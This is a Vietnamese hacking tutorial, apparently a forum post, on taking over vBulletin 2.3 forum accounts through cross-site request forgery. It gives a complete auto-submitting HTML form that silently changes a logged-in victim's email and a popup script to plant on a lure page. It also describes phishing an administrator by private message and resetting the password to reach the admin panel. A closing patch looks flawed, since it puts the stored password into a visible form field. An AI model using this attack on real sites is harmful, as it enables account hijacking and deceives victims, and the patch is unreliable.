Cách này áp dụng chung cho tất cả các forum nào không đòi hỏi phải điền mật khẩu khi change email và đây là cách để hack forum vbb 2.3 trở xuống vì trong phiên bản mới 3.0 của vbb đã yêu cầu nhập password khi change email .
Bước 1 : tạo 1 file đặt tên là popup.htm có nội dung như sau :
<html>
<body onload="javascript:document.forms[0].submit();">
<center>
<table cellSpacing="0" cellPadding="0" width="100%" bgColor="#ffffff" border="0" height="168" style="border-collapse: collapse" bordercolor="#111111">
<tr>
<td height="148">
<p><br>
</p>
<p><br>
</p>
<center>
<p>
</p>
</center>
<form action="http://localhost/vbb/member.php" method="post">
<input type="hidden" value="" name="s">
<p>
<font face="verdana, arial, helvetica" size="2">
<input class="bginput" maxLength="150" type="hidden" size="30" value="mask_nbta_83@yahoo.com" name="email"></font><br>
<font face="verdana, arial, helvetica" size="2">
<input class="bginput" maxLength="150" type="hidden" size="30" value="mask_nbta_83@yahoo.com" name="emailconfirm"></font></p>
<table cellSpacing="0" cellPadding="2" width="100%" align="center" border="0" height="1">
<tr>
<td align="middle" height="1"><font face="verdana, arial, helvetica" size="2">
<input type="hidden" value="updateprofile" name="action">
<input class="bginput" accessKey="s" type="submit" value="Submit" name="Submit">
</font></td>
</tr>
</table>
</form>
</td>
</tr>
</table>
</center>
</body>
</html>
bạn chú ý cái session , chúng ta nên để là khoảng trắng vì vì nó sẽ trả về session hiện tại của nạn nhân khi ta thay đồi email của họ .
Cái popup.htm này sẽ auto submit khi ta open nó ----> nạn nhân sẽ không hề hay biết họ đã bị change email .
Khi hack bạn chú ý thay đổi cái action cho phù hợp với website mà mình muốn hack .
Bạn có thể thay đổi cái email
mask_nbta_83@yahoo.com thành email của mình hay email nào mà bạn muốn .
Bước 2 : Tôi gọi website của tôi là
http://www.masknbta.com/index.htm .
Open source của cái index.htm , thêm đoạn code này vào :
<script language='JavaScript'>
window.open('popup.htm','Popup','width=30,height=30');
</script>
Khi nạn nhân view cái website của bạn thì 1 popup sẽ tự xuất hiện , và auto submit change email theo ý mình .
Buớc 3 : dụ dỗ nạn nhân vào website : có rất nhiều cách nhưng để thực hiên đươc mục tiêu thì nhất định nạn nhân phải đang login trong forum mà ta muốn hack , tôi sẽ đưa ra 1 cách minh hoạ : đăng kí 1 account trong forum , private cho victim với nội dung là check dùm secure cho website , và sau đó mọi chuyện sẽ diễn ra theo đúng ý ta nếu victim click vào link .
Sau khi change email thì bạn forgot password sau đó vào
http://victim/admin/index.php với user và pass vừa có được .
Điểm đặc bịêt cần lưu ý là email của bạn đăng kí trong forum phải không được trùng với email mà bạn muốn victim thay đổi , nếu không thì sẽ không đạt kết quả .
Như vậy là đã xong cách hack .
Cách fix :
Mở file admin/vbulletin.style tìm
<tr>
<td bgcolor="{secondaltcolor}"><normalfont><b>Confirm Email Address:</b></normalfont></td>
<td bgcolor="{secondaltcolor}"><normalfont><input type="text" class="bginput" name="emailconfirm" value="$bbuserinfo[email]" size="30" maxlength="150"></normalfont></td>
</tr>
them vao ben duoi :
<tr>
<td bgcolor="{secondaltcolor}"><normalfont><b>Your password:</b></normalfont></td>
<td bgcolor="{secondaltcolor}"><normalfont><input type="text" class="bginput" name="pword" value="$bbuserinfo[password]" size="30" maxlength="150"></normalfont></td>
</tr>
Mở file /member.php , tìm:
if ($requireuniqueemail and $bbuserinfo['email']!=$email and $checkuser=$DB_site->query_first("SELECT userid,username,email FROM user WHERE email='".addslashes
thêm vào bên trên như thế này:
///////////////////////////////////////Mask's fix///////////////////////
if ($userinfo[password]!=$password)
{
die("Da duoc fix , dung hack vo ich");
}
////////////////////////////////////////////////////////////////////////
if ($requireuniqueemail and $bbuserinfo['email']!=$email and $checkuser=$DB_site->query_first("SELECT userid,username,email FROM user WHERE email='".addslashes
tim :
if ($email=="" or $emailconfirm=="")
them vao :
if ($email=="" or $emailconfirm=="" or $pword=="").